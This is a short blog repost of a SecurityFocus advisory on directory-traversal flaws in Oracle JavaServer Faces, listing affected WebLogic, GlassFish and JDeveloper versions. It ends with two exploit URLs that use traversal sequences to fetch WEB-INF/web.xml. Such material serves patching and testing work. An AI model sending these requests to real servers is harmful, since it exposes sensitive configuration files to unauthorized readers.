Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86386539

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

source: https://www.securityfocus.com/bid/63052/info

Oracle JavaServer Faces is prone to multiple directory-traversal vulnerabilities.

Exploiting these issues may allow an attacker to obtain sensitive information that could aid in further attacks.

This vulnerability affects the following products and versions:

WebLogic Server 10.3.6.0, 12.1.1.0
GlassFish Server 2.1.1, 3.0.1, 3.1.2
JDeveloper 11.1.2.3.0, 11.1.2.4.0, 12.1.2.0.0 

http://www.example.com/someApp/javax.faces.resource.../WEB-INF/web.xml.jsf
http://www.example.com/someApp/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..